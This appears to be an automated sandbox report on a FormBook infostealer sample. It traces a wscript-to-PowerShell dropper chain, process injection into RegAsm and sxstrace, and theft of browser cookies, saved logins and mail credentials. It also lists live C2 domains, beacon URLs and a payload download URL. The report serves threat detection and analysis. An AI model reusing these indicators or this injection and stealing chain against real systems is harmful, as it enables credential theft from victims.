                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeSection loaded: NULL target: C:\Windows\SysWOW64\sxstrace.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: NULL target: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: NULL target: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeThread register set: target process: 2004Jump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeThread APC queued: target process: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 758008Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeProcess created: C:\Windows\SysWOW64\sxstrace.exe "C:\Windows\SysWOW64\sxstrace.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: W4ja93oMuuBdSP.exe, 00000007.00000000.1778699277.0000000001521000.00000002.00000001.00040000.00000000.sdmp, W4ja93oMuuBdSP.exe, 00000007.00000002.2894238439.0000000001520000.00000002.00000001.00040000.00000000.sdmp, W4ja93oMuuBdSP.exe, 0000000C.00000000.1926579433.00000000017E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: W4ja93oMuuBdSP.exe, 00000007.00000000.1778699277.0000000001521000.00000002.00000001.00040000.00000000.sdmp, W4ja93oMuuBdSP.exe, 00000007.00000002.2894238439.0000000001520000.00000002.00000001.00040000.00000000.sdmp, W4ja93oMuuBdSP.exe, 0000000C.00000000.1926579433.00000000017E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: W4ja93oMuuBdSP.exe, 00000007.00000000.1778699277.0000000001521000.00000002.00000001.00040000.00000000.sdmp, W4ja93oMuuBdSP.exe, 00000007.00000002.2894238439.0000000001520000.00000002.00000001.00040000.00000000.sdmp, W4ja93oMuuBdSP.exe, 0000000C.00000000.1926579433.00000000017E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: W4ja93oMuuBdSP.exe, 00000007.00000000.1778699277.0000000001521000.00000002.00000001.00040000.00000000.sdmp, W4ja93oMuuBdSP.exe, 00000007.00000002.2894238439.0000000001520000.00000002.00000001.00040000.00000000.sdmp, W4ja93oMuuBdSP.exe, 0000000C.00000000.1926579433.00000000017E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.1856770883.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2893431471.00000000007A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1855092253.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2893171998.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2894680683.00000000053E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1864268755.00000000051D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2896359779.0000000005580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2893509705.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\sxstrace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.1856770883.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2893431471.00000000007A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1855092253.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2893171998.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2894680683.00000000053E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1864268755.00000000051D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2896359779.0000000005580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2893509705.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information21
                Scripting
                Valid Accounts1
                Exploitation for Client Execution
                21
                Scripting
                1
                Abuse Elevation Control Mechanism
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                3
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                PowerShell
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                LSASS Memory113
                System Information Discovery
                Remote Desktop Protocol1
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)712
                Process Injection
                1
                Abuse Elevation Control Mechanism
                Security Account Manager221
                Security Software Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information
                NTDS2
                Process Discovery
                Distributed Component Object ModelInput Capture5
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing
                LSA Secrets41
                Virtualization/Sandbox Evasion
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Timestomp
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Masquerading
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt41
                Virtualization/Sandbox Evasion
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron712
                Process Injection
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1595900 Sample: 11001_10032.jse Startdate: 21/01/2025 Architecture: WINDOWS Score: 100 49 www.meacci.xyz 2->49 51 www.extremedoge.xyz 2->51 53 7 other IPs or domains 2->53 73 Suricata IDS alerts for network traffic 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 Yara detected FormBook 2->77 81 5 other signatures 2->81 12 wscript.exe 1 16 2->12         started        signatures3 79 Performs DNS queries to domains with low reputation 51->79 process4 dnsIp5 61 files.catbox.moe 108.181.20.35, 443, 49731 ASN852CA Canada 12->61 47 C:\Temp\dddddd.ps1, ASCII 12->47 dropped 103 System process connects to network (likely due to code injection or exploit) 12->103 105 Wscript starts Powershell (via cmd or directly) 12->105 107 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->107 109 Suspicious execution chain found 12->109 17 powershell.exe 13 12->17         started        file6 signatures7 process8 file9 45 C:\Users\user\AppData\Local\Temp\x.exe, PE32 17->45 dropped 67 Suspicious execution chain found 17->67 69 Found suspicious powershell code related to unpacking or dynamic code loading 17->69 71 Powershell drops PE file 17->71 21 x.exe 3 17->21         started        24 conhost.exe 17->24         started        signatures10 process11 signatures12 91 Antivirus detection for dropped file 21->91 93 Multi AV Scanner detection for dropped file 21->93 95 Machine Learning detection for dropped file 21->95 97 3 other signatures 21->97 26 RegAsm.exe 21->26         started        29 RegAsm.exe 21->29         started        31 RegAsm.exe 21->31         started        process13 signatures14 101 Maps a DLL or memory area into another process 26->101 33 W4ja93oMuuBdSP.exe 26->33 injected process15 signatures16 63 Maps a DLL or memory area into another process 33->63 65 Found direct / indirect Syscall (likely to bypass EDR) 33->65 36 sxstrace.exe 13 33->36         started        process17 signatures18 83 Tries to steal Mail credentials (via file / registry access) 36->83 85 Tries to harvest and steal browser information (history, passwords, etc) 36->85 87 Modifies the context of a thread in another process (thread injection) 36->87 89 3 other signatures 36->89 39 W4ja93oMuuBdSP.exe 36->39 injected 43 firefox.exe 36->43         started        process19 dnsIp20 55 www.extremedoge.xyz 13.248.169.48, 49738, 49739, 49740 AMAZON-02US United States 39->55 57 www.zltbd.top 198.2.236.221, 49964, 49982, 49998 PEGTECHINCUS United States 39->57 59 3 other IPs or domains 39->59 99 Found direct / indirect Syscall (likely to bypass EDR) 39->99 signatures21

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                11001_10032.jse0%ReversingLabs
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\x.exe100%AviraTR/Dropper.Gen
                C:\Users\user\AppData\Local\Temp\x.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\x.exe58%ReversingLabsWin32.Trojan.Mardom
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.lifesentials.life0%Avira URL Cloudsafe
                http://www.zltbd.top/1jgm/?MXwP=r6KXAX&hJmlwzIP=eA6uj9mZZG+EKrxfsgaQ42jUHFJ9YTaKp1gfdi5CfcM9nM+TLjgWIBBxg97B6s/Mfw+pZcxy3UCwgSBQo6fC0TmW4jrT+zNrDB2c59DmLVqXHBtysJ+4ikY=0%Avira URL Cloudsafe
                http://www.67051.app/fm7p/?hJmlwzIP=fBQGVIP7Njvsfk9lzVhNu8pCqf4YkOx9Vaqk3JyU25ETPeViuHfh6mR7/D77kz//dgcg4mAG64G/nkTmvcQD6acAcwOPjm8QE+VPRg3PkMui+g1AImFFsl0=&MXwP=r6KXAX0%Avira URL Cloudsafe
                http://www.meacci.xyz/y3n2/?hJmlwzIP=YYHifcw1ROMF/3RuimpNfLhUsxuxcMKtO4hXXvbRKVUVh0h/q4DMqrOnAhjmriRcqxzsaBbGiU8bH2oMXqD7zJXTKDI0OQUw5wG7ZoblKeO6xygGb+5lBKM=&MXwP=r6KXAX0%Avira URL Cloudsafe
                http://www.lifesentials.life/ai0p/0%Avira URL Cloudsafe
                http://www.laohuc58.net/q2xw/?hJmlwzIP=86ngbchxwzH4i1X9tvmDuu6h7KJUbTio6Z6AqXex3cvjnWz71i6By1b+gePkvn/3vIhelgCsabemLlfWnEKjEh6EsUgiLzm62QdsAvr1MIDgwhA918qePzY=&MXwP=r6KXAX0%Avira URL Cloudsafe
                http://www.brothersharetender.xyz/zt2z/?MXwP=r6KXAX&hJmlwzIP=xrZBxJYgw8cIQMiqBrQZCYZ61pZy1dzsCIunmK+cvRjjBmIrzA2dxOVWDq4Jp+FwENZ0JGktrRBqMPL/mVPT2t/SNJFN32SpTrkJkEsgpQXd8JnHvN7s+C8=0%Avira URL Cloudsafe
                http://www.zltbd.top/1jgm/0%Avira URL Cloudsafe
                http://www.extremedoge.xyz/d8se/0%Avira URL Cloudsafe
                http://www.laohuc58.net/q2xw/0%Avira URL Cloudsafe
                http://www.meacci.xyz/y3n2/0%Avira URL Cloudsafe
                http://www.67051.app/fm7p/0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                files.catbox.moe
                108.181.20.35
                truefalse
                  high
                  www.lifesentials.life
                  63.250.47.57
                  truefalse
                    unknown
                    www.67051.app
                    103.215.78.119
                    truefalse
                      unknown
                      www.brothersharetender.xyz
                      13.248.169.48
                      truetrue
                        unknown
                        www.meacci.xyz
                        13.248.169.48
                        truetrue
                          unknown
                          r0lqcud7.nbnnn.xyz
                          23.225.159.42
                          truefalse
                            high
                            www.extremedoge.xyz
                            13.248.169.48
                            truetrue
                              unknown
                              www.zltbd.top
                              198.2.236.221
                              truefalse
                                unknown
                                www.laohuc58.net
                                unknown
                                unknownfalse
                                  unknown
                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.brothersharetender.xyz/zt2z/?MXwP=r6KXAX&hJmlwzIP=xrZBxJYgw8cIQMiqBrQZCYZ61pZy1dzsCIunmK+cvRjjBmIrzA2dxOVWDq4Jp+FwENZ0JGktrRBqMPL/mVPT2t/SNJFN32SpTrkJkEsgpQXd8JnHvN7s+C8=false
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.zltbd.top/1jgm/?MXwP=r6KXAX&hJmlwzIP=eA6uj9mZZG+EKrxfsgaQ42jUHFJ9YTaKp1gfdi5CfcM9nM+TLjgWIBBxg97B6s/Mfw+pZcxy3UCwgSBQo6fC0TmW4jrT+zNrDB2c59DmLVqXHBtysJ+4ikY=false
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://files.catbox.moe/p53ou1.ps1false
                                    high
                                    http://www.zltbd.top/1jgm/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.laohuc58.net/q2xw/?hJmlwzIP=86ngbchxwzH4i1X9tvmDuu6h7KJUbTio6Z6AqXex3cvjnWz71i6By1b+gePkvn/3vIhelgCsabemLlfWnEKjEh6EsUgiLzm62QdsAvr1MIDgwhA918qePzY=&MXwP=r6KXAXfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.lifesentials.life/ai0p/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.laohuc58.net/q2xw/false
